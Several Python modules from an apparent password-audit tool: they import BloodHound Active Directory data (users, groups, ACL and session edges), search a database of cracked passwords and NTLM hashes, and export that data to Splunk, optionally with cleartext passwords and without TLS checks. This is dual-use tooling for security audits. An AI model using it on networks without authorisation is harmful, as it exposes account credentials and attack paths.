                            "membership": self.groups.get(gid, []).get("membership", [])
                        })

                        self.db.insert_group(
                            domain=self.groups[gid]['domain_id'],
                            object_identifier=self.groups[gid].get('object_identifier', '') if self.groups[gid].get(
                                'object_identifier', None) is not None else '',
                            name=self.groups[gid]['name'],
                            dn=self.groups[gid].get('dn', '') if self.groups[gid].get('dn', None) is not None else '',
                            members=json.dumps(self.groups[gid]['json_members']),
                            membership=','.join(self.groups[gid]['membership'])
                        )

            except KeyboardInterrupt as e:
                raise e
            finally:
                bar.hide = True
                Tools.clear_line()

        if len(self.groups) > 0:

            Color.pl('{?} {W}{D}calculating group chain...{W}' + ' ' * 50)
            cnt = len(self.groups)
            with progress.Bar(label=" Processing ", expected_size=cnt) as bar:
                try:
                    for idx, g in enumerate(self.groups):
                        bar.show(idx)

                        self.groups[g]['membership'] = [g1 for g1 in self.get_group_chain(self.groups, g, [])]

                except KeyboardInterrupt as e:
                    raise e
                finally:
                    bar.hide = True
                    Tools.clear_line()

    def parse_users_file(self, files):
        Color.pl('{?} {W}{D}loading groups from db...{W}' + ' ' * 50)
        user_groups = {}
        groups = {}

        db_groups = self.db.select('groups')

        with progress.Bar(label=" Loading ", expected_size=len(db_groups)) as bar:
            try:
                for idx, row in enumerate(db_groups):
                    bar.show(idx)

                    gid = row['group_id']
                    members = json.loads(row['members'])
                    for g in members:
                        t = g['ObjectType']
                        oid = g['ObjectIdentifier']
                        if t == "User":
                            ug = user_groups.get(oid, [])
                            ug.append(gid)
                            user_groups[oid] = ug

                    groups[gid] = {
                        'name': row['name'],
                        'membership': row['membership'].split(',')
                    }

            except KeyboardInterrupt as e:
                raise e
            finally:
                bar.hide = True
                Tools.clear_line()

        Tools.clear_line()
        Color.pl('{?} {W}{D}importing users...{W}' + ' ' * 50)
        total = sum(f.items for f in files)
        with progress.Bar(label=" Processing ", expected_size=total) as bar:
            try:
                count = 0
                for file in files:
                    data = file.get_json().get('data', [])
                    for idx, user in enumerate(data):
                        count += 1
                        bar.show(count)

                        oid = user.get('ObjectIdentifier', None)
                        properties = user.get('Properties', None)

                        if oid is None or properties is None:
                            raise Exception('Unable to parse user data 1: %s' % json.dumps(user))

                        name = properties.get('name', '@').split('@')[0].lower()
                        dn = properties.get('distinguishedname', None)

                        if name is None:
                            raise Exception('Unable to parse user data 2: %s' % json.dumps(user))

                        domain_id = self.get_domain(properties)

                        full_name = properties.get('displayname', '')
                        pwd_last_set = datetime.datetime.fromtimestamp(properties.get('pwdlastset', 0))
                        enabled = bool(properties.get('enabled', True))

                        self.db.insert_or_update_credential(
                            domain=domain_id,
                            username=name,
                            groups=self.get_user_groups(groups, user_groups, oid),
                            object_identifier=oid,
                            dn=dn,
                            ntlm_hash='',
                            type='U',
                            full_name=full_name,
                            pwd_last_set=pwd_last_set,
                            enabled=enabled
                        )

                        self.db.insert_or_update_bloodhound_object(
                            label='User',
                            object_id=oid,
                            filter_type='objectid',
                            source=oid,
                            **properties
                        )

                        if (pgsid := Tools.get_dict_value(user, 'PrimaryGroupSID')) is not None:
                            if pgsid not in self.groups:
                                self.groups[pgsid] = {"members": []}
                            self.groups[pgsid]['members'].append(oid)

                            self.db.insert_or_update_bloodhound_edge(
                                source=oid,
                                target=pgsid,
                                source_label='User',
                                target_label='Group',
                                edge_type='MemberOf',
                                edge_props='{isacl: false}',
                                filter_type='objectid',
                                props=dict(source=oid, target=pgsid)
                            )

                        for entry in Tools.get_dict_value(user, 'AllowedToDelegate', []):
                            self.db.insert_or_update_bloodhound_edge(
                                source=oid,
                                target=entry,
                                source_label='User',
                                target_label='Computer',
                                edge_type='AllowedToDelegate',
                                edge_props='{isacl: false}',
                                filter_type='objectid',
                                props=dict(source=oid, target=entry)
                            )

                        # TODO add HasSIDHistory objects

                        if 'Aces' in user and user['Aces'] is not None:
                            self.process_ace_list(user['Aces'], oid, "User")

                        if 'SPNTargets' in user and user['SPNTargets'] is not None:
                            self.process_spntarget_list(user['SPNTargets'], oid)

            except KeyboardInterrupt as e:
                raise e
            finally:
                bar.hide = True
                Tools.clear_line()

    def get_user_groups(self, groups, user_groups, user_id):
        ug = user_groups.get(user_id, [])
        gids = []
        for g in ug:
            tmp = groups[g]['membership']
            for t in tmp:
                if t not in gids:
                    gids.append(t)

        group_names = []
        for g in gids:
            gname = groups.get(g, {}).get("name", None)
            if gname is not None:
                group_names.append(gname)

        return ', '.join(group_names)

    def get_files(self, path):
        for file in os.listdir(path):
            p1 = os.path.join(path, file)
            if os.path.isfile(p1):
                yield p1
            elif os.path.isdir(p1):
                yield from self.get_files(p1)

    def get_group_chain(self, groups, group_id, chain):

        if group_id in chain:
            return []

        grp = []
        grp.append(group_id)

        if not self.chain_enabled:
            return grp

        for g in groups:
            members = groups[g].get('members', [])
            if group_id in members:
                if g not in grp:
                    grp.append(g)
                    tmp = self.get_group_chain(groups, g, chain + grp)
                    for t in tmp:
                        if t not in grp:
                            grp.append(t)
        return grp

    def get_domain(self, properties):
        domain_name = properties.get('domain', None)
        if domain_name is None:
            properties.get('name', '@').split('@')[1].lower()
        domain_name = domain_name.lower()
        domain_sid = properties.get('domainsid', '')

        if domain_sid in self.domain_cache:
            return self.domain_cache[domain_sid]

        domain_id = self.db.insert_or_get_domain(
            domain=domain_name,
            object_identifier=domain_sid
        )

        if domain_id == -1:
            raise Exception('Unable to get/create domain from JSON: %s' % json.dumps(properties))

        self.domain_cache[domain_sid] = domain_id

        return domain_id

    def process_ace_list(self, ace_list: list, objectid: str, objecttype: str) -> None:
        for entry in ace_list:
            principal = entry['PrincipalSID']
            principaltype = entry['PrincipalType']
            right = entry['RightName']

            if objectid == principal:
                continue

            props = dict(
                source=principal,
                target=objectid,
                isinherited=entry['IsInherited'],
            )

            self.db.insert_or_update_bloodhound_edge(
                source=principal,
                target=objectid,
                source_label=principaltype,
                target_label=objecttype,
                edge_type=right,
                edge_props='{isacl: true, isinherited: prop.isinherited}',
                filter_type='objectid',
                props=props
            )

    def process_spntarget_list(self, spntarget_list: list, objectid: str) -> None:
        for entry in spntarget_list:
            props = dict(
                source=objectid,
                target=entry['ComputerSID'],
                port=entry['Port'],
            )

            self.db.insert_or_update_bloodhound_edge(
                source=objectid,
                target=entry['ComputerSID'],
                source_label='User',
                target_label='Computer',
                edge_type='SPNTarget',
                edge_props='{isacl: false, port: prop.port}',
                filter_type='objectid',
                props=props
            )

    def process_options(self, target: dict, target_type: str) -> None:

        options = [
            ('LocalAdmins', 'AdminTo', '{isacl:false, fromgpo: false}', []),
            ('PSRemoteUsers', 'CanPSRemote', '{isacl:false, fromgpo: false}', []),
            ('DcomUsers', 'ExecuteDCOM', '{isacl:false, fromgpo: false}', []),
            ('RemoteDesktopUsers', 'CanRDP', '{isacl:false, fromgpo: false}', []),
            ('Sessions', 'HasSession', '{isacl:false, source:"netsessionenum"}', ['User']),
            ('PrivilegedSessions', 'HasSession', '{isacl:false, source:"netwkstauserenum"}', ['User']),
            ('RegistrySessions', 'HasSession', '{isacl:false, source:"registry"}', ['User']),
        ]

        maps = dict(
            user=['ObjectIdentifier', 'UserSID'],
            computer=['ObjectIdentifier', 'ComputerSID'],
        )

        oid = Tools.get_dict_value(target, 'ObjectIdentifier', None)
        if oid is None:
            return

        for option, edge_name, edge_props, ot_list in options:
            if isinstance((source := Tools.get_dict_value(target, option, {})), dict):
                if isinstance((r_dict := Tools.get_dict_value(source, 'Results', [])), list):

                    for src_data in r_dict:

                        if isinstance(src_data, dict):

                            sid = Tools.get_dict_value(src_data, 'ObjectIdentifier', None)
                            st = src_data.get('ObjectType', None)
                            if st is None:
                                st, sid = next(iter([
                                    (o, v) for o in ot_list for k in maps[o.lower()]
                                    if (v := Tools.get_dict_value(src_data, k, None)) is not None
                                ]), (None, None))

                            if st is None or sid is None:
                                raise Exception('Unable to get/create property from JSON: %s' % json.dumps(source))

                            self.db.insert_or_update_bloodhound_edge(
                                source=oid,
                                target=sid,
                                source_label=target_type,
                                target_label=st,
                                edge_type=edge_name,
                                edge_props=edge_props,
                                filter_type='objectid',
                                props=dict(target=sid, source=oid)
                            )



import json
import os
import sqlite3
import time
from argparse import _ArgumentGroup, Namespace
from pathlib import Path
from binascii import hexlify
from enum import Enum

from knowsmore.util.tools import Tools

from knowsmore.cmdbase import CmdBase
from knowsmore.password import Password
from knowsmore.util.color import Color
from knowsmore.util.database import Database
from knowsmore.util.knowsmoredb import KnowsMoreDB
from knowsmore.util.logger import Logger


class Find(CmdBase):
    class FindMode(Enum):
        All = 0, "All"
        Password = 1, "Password Only"

    db = None
    find_text = ''
    out_file = None
    cracked_only = False
    json_format = False
    find_type = FindMode.All

    def __init__(self):
        super().__init__('find', 'Find an string (user, group, domain, password) at database')

    def add_flags(self, flags: _ArgumentGroup):
        flags.add_argument('-o', '--save-to',
                           action='store',
                           default='',
                           dest=f'out_file',
                           help=Color.s(
                               'Output file to save JSON data'))

        flags.add_argument('--cracked-only',
                           action='store_true',
                           default=False,
                           dest=f'cracked_only',
                           help=Color.s('Find cracked data only'))

        flags.add_argument('--json',
                           action='store_true',
                           default=False,
                           dest=f'json_format',
                           help=Color.s('Output in JSON format instead of text table'))

    def add_commands(self, cmds: _ArgumentGroup):
        cmds.add_argument('--text',
                          action='store',
                          metavar='[text]',
                          type=str,
                          dest=f'txt_find',
                          help=Color.s('Text to look for at all columns'))

        cmds.add_argument('--password',
                          action='store',
                          metavar='[text]',
                          type=str,
                          dest=f'txt_pwd_find',
                          help=Color.s('Text to look for in password field only'))

    def load_from_arguments(self, args: Namespace) -> bool:
        if args.txt_find is not None and args.txt_find.strip() != '':
            self.find_type = Find.FindMode.All
            self.find_text = args.txt_find
        elif args.txt_pwd_find is not None and args.txt_pwd_find.strip() != '':
            self.find_type = Find.FindMode.Password
            self.find_text = args.txt_pwd_find

        if self.find_text is None or self.find_text.strip() == '':
            Logger.pl('{!} {R}error: text is invalid {O}%s{R} {W}\r\n' % (
                self.find_text))
            exit(1)

        if args.out_file is not None and args.out_file.strip() != '':
            self.out_file = Path(args.out_file).absolute()

        if self.out_file is not None:
            if os.path.exists(self.out_file):
                Logger.pl('{!} {R}error: out file ({O}%s{R}) already exists {W}\r\n' % (
                    self.out_file))
                exit(1)

        self.db = self.open_db(args)
        self.cracked_only = args.cracked_only
        self.json_format = args.json_format

        Logger.pl('     {C}find mode:{O} %s{W}' % str(self.find_type.name))
        Logger.pl('     {C}find text:{O} %s{W}' % self.find_text)
        Logger.pl('     {C}cracked only:{O} %s{W}' % self.cracked_only)

        return True

    def run(self):

        txt = f'%{self.find_text}%'
        hex = f'%{hexlify(self.find_text.encode("latin-1")).decode("UTF-8").lower()}%'
        sql = (
            'select c.credential_id, c.name, c.type, c.object_identifier, c.dn, d.domain_id, d.name as domain_name, d.object_identifier as domain_object_identifier, '
            'd.dn as domain_dn, p.password, p.ntlm_hash, p.md5_hash, p.sha1_hash, p.sha256_hash, p.sha512_hash '
            'from credentials as c '
            'inner join passwords as p '
            'on c.password_id = p.password_id '
            'inner join domains as d '
            'on c.domain_id = d.domain_id '

        )
        pwd = Password(ntlm_hash='', clear_text=self.find_text)

        if self.find_type.value == Find.FindMode.Password.value:
            sql += (
                ' where ('
                '   p.password like ? or p.password like ? '
                '   or p.ntlm_hash like ? or p.ntlm_hash like ?'
                ')'
            )
            args = [hex, txt, txt, pwd.ntlm_hash]

        else: #all
            sql += (
                ' where ('
                '   p.password like ? or p.password like ? or p.ntlm_hash like ? or p.ntlm_hash like ? '
                '   or c.name like ? or c.object_identifier like ? or c.dn like ? '
                '   or c.groups like ?'
                ')'
            )
            args = [hex, txt, pwd.ntlm_hash, txt, txt, txt, txt, txt]

        if self.cracked_only:
            sql += ' and (p.length > 0) '

        sql += ' order by c.name'

        # Look for users, groups
        rows = self.db.select_raw(
            sql=sql,
            args=args
        )

        if len(rows) == 0:
            Logger.pl('{!} {O}Nothing found with this text{W}\r\n')
            exit(0)

        news = {}
        for r in rows:
            p = r.get('password', '')
            if '$HEX[' in p:
                p1 = Password('', p)
                r['password'] = p1.latin_clear_text

            # verify it is a new password (not yet registered)
            if r['ntlm_hash'] == pwd.ntlm_hash and r['password'] == '':
                news[pwd.ntlm_hash] = pwd.clear_text

                # adjust output table
                r['password'] = self.find_text

                # register the new password
                self.db.insert_password_manually(pwd)

        if self.out_file is None and not self.json_format:
            print(Tools.get_tabulated(rows))

        else:
            dump = json.dumps(
                    {
                        'data': rows,
                        'meta': {
                            'type': 'credentials',
                            'count': len(rows),
                            'version': 1
                        }
                    }
                )

            if self.out_file is not None:
                with open(self.out_file, "a", encoding="UTF-8") as text_file:
                    text_file.write(dump)
            else:
                print(dump)

        for k, v in news.items():
            Logger.pl('{+} {O}New password cracked! MTLM: {G}%s{O} Password: {G}%s{W}' % (k, v))

        Logger.pl('{+} {O}%s{W}{C} register found{W}' % len(rows))









from typing import Any
import queue
import threading


class BloodhoundSync:
    __running = False
    q = None
    __total = 0
    __count = 0
    threads = 1
    callback = None
    per_thread_callback = None
    inserted = []

    def __init__(self, callback: Any = None, per_thread_callback: Any = None, threads=2):
        if callback is None or not callable(callback):
            raise Exception('worker is not callable')

        if per_thread_callback is not None and not callable(per_thread_callback):
            raise Exception('per_thread_callback is not callable')

        self.callback = callback
        self.per_thread_callback = per_thread_callback
        self.q = queue.Queue()
        self.threads = threads
        self.total = 0
        self.inserted = []
        if self.threads <= 1:
            self.threads = 1

    def __enter__(self):
        return self

    def __exit__(self, exception_type, exception_value, traceback):
        self.close()

    def add_item(self, id, item) -> bool:
        if id not in self.inserted:
            self.inserted.append(id)
            self.q.put(item)
            self.__total += 1
            return True
        return False

    def start(self, **kwargs):

        if self.callback is None or not callable(self.callback):
            raise Exception('The worker is not callable')

        self.__running = True
        self.__count = 0
        for i in range(self.threads):
            t = threading.Thread(target=self.__worker, kwargs=dict(index=i, **kwargs))
            t.daemon = True
            t.start()

    def __worker(self, index, **kwargs):
        tcb = None
        if self.per_thread_callback is not None:
            tcb = self.per_thread_callback(index, **kwargs)

        while self.__running:
            entry = self.q.get()

            if entry is None:
                self.q.task_done()
                continue

            try:
                self.callback(entry=entry, thread_callback_data=tcb, **kwargs)
            finally:
                self.__count += 1
                self.q.task_done()

    @property
    def count(self):
        return len(self.q.queue)

    @property
    def executed(self):
        return self.__count

    @property
    def running(self):
        return self.__running

    def close(self):
        self.__running = False
        self.inserted = []
        with self.q.mutex:
            self.q.queue.clear()



import json
import os
import sqlite3
import time
import requests
import socket
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from argparse import _ArgumentGroup, Namespace
from pathlib import Path
from binascii import hexlify
from enum import Enum
from urllib3.util import parse_url
from clint.textui import progress

from knowsmore.libs.exporterbase import ExporterBase
from knowsmore.util.tools import Tools

from knowsmore.cmdbase import CmdBase
from knowsmore.password import Password
from knowsmore.util.color import Color
from knowsmore.util.database import Database
from knowsmore.util.knowsmoredb import KnowsMoreDB
from knowsmore.util.logger import Logger

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)


class Splunk(CmdBase):
    db = None
    url_base = None
    url_path = '/services/collector/event'
    token_base = None
    cracked_only = False
    include_password = False

    def __init__(self):
        super().__init__('splunk', 'Export data to Splunk')

    def add_flags(self, flags: _ArgumentGroup):
        flags.add_argument('--include-password',
                           action='store_true',
                           default=False,
                           dest=f'include_password',
                           help=Color.s('Include clear text passwords and his hashes. (default: False)'))

        flags.add_argument('--cracked-only',
                           action='store_true',
                           default=False,
                           dest=f'cracked_only',
                           help=Color.s('Integrate cracked data only. (default: False)'))

    def add_commands(self, cmds: _ArgumentGroup):
        cmds.add_argument('--token',
                          action='store',
                          metavar='[text]',
                          type=str,
                          dest=f'txt_token',
                          help=Color.s('API Token to integrate'))

        cmds.add_argument('--url',
                          action='store',
                          metavar='[text]',
                          type=str,
                          dest=f'txt_url',
                          help=Color.s('URL to Splunk'))

    def load_from_arguments(self, args: Namespace) -> bool:
        if (args.txt_url is not None and args.txt_url.strip() != '' \
            and args.txt_token is not None and args.txt_token.strip() != ''):

            url = parse_url(args.txt_url)

            #Adicionar aqui o caminho padrão da API do Splunk
            self.url_base = f'{url.scheme}://{url.netloc}/'
            self.token_base = args.txt_token

            '''
            Splunk check connection
            '''
            try:
                socket.create_connection((url.hostname, url.port))
                Logger.pl('     {C}splunk connection:{O} %s{W}' % url.hostname)
            except Exception as e:
                Color.pl('{!} {R}error: Splunk server not found {O}%s{R}{W}\r\n' % e) 
                exit(1)
            # Passos s realizar aqui
            # 1 - Checar conexão com o Splunk
            # 2 - Outras checagens de segurança
            # 3 - Criação do índice

            db_name = os.path.abspath(args.dbfile.strip())

            if not os.path.isfile(db_name):
                Color.pl('{!} {R}error: database file not found {O}%s{R}{W}\r\n' % db_name)
                exit(1)

            try:
                self.db = ExporterBase(auto_create=False, db_name=db_name)

                self.db.check_open()

            except sqlite3.OperationalError as e:
                print(e)
                Logger.pl(
                    '{!} {R}error: the database file exists but is not an SQLite or table structure was not created. Use parameter {O}--create-db{R} command to create.{W}\r\n')
                exit(1)
            except Exception as e:
                raise e

            self.cracked_only = args.cracked_only
            self.include_password = args.include_password

            Logger.pl('     {C}splunk:{O} %s{W}' % str(self.url_base))
            Logger.pl('     {C}cracked only:{O} %s{W}' % self.cracked_only)
            Logger.pl('     {C}include clear text passwords:{O} %s{W}' % self.include_password)

        return True

    def run(self):

        total = self.db.get_data_len(cracked_only=self.cracked_only)
        count = 0
        with progress.Bar(label=" Syncing objects ", expected_size=total, every=5) as bar:
            try:
                for entry in self.db.get_data(
                        export_password=self.include_password,
                        cracked_only=self.cracked_only):
                    count += 1

                    if count > total:
                        bar.expected_size = count
                    bar.show(count)

                    '''
                    Integration with Splunk
                    '''
                    url = self.url_base + self.url_path
                    headers = {
                            'Authorization': self.token_base,
                            'Content-Type': 'application/json'
                    }
                    dict_payload = dict(event=entry)
                    json_payload = json.dumps(dict_payload)
                    try:
                        response = requests.request("POST", url, headers=headers, data=json_payload, verify=False)
                        response.raise_for_status()
                    except requests.exceptions.HTTPError as error_http:
                        Color.pl('{!} {R}error: HTTP Error {O}%s{R}{W}\r\n' % error_http)
                        exit(1)
                    except requests.exceptions.ConnectionError as error_connection:
                        Color.pl('{!} {R}error: Connection Error {O}%s{R}{W}\r\n' % error_connection)
                        exit(1)
                    except requests.exceptions.Timeout as error_timeout:
                        Color.pl('{!} {R}error: Timeout Error {O}%s{R}{W}\r\n' % error_timeout)
                        exit(1)
                    except requests.exceptions.RequestException as error_all:
                        Color.pl('{!} {R}error: Generic Error {O}%s{R}{W}\r\n' % error_all)
                        exit(1)
                    time.sleep(0.0300)

            except KeyboardInterrupt as e:
                raise e
            finally:
                bar.hide = True
                Tools.clear_line()

        Logger.pl('{+} {O}%s{W}{C} integrated{W}' % count)






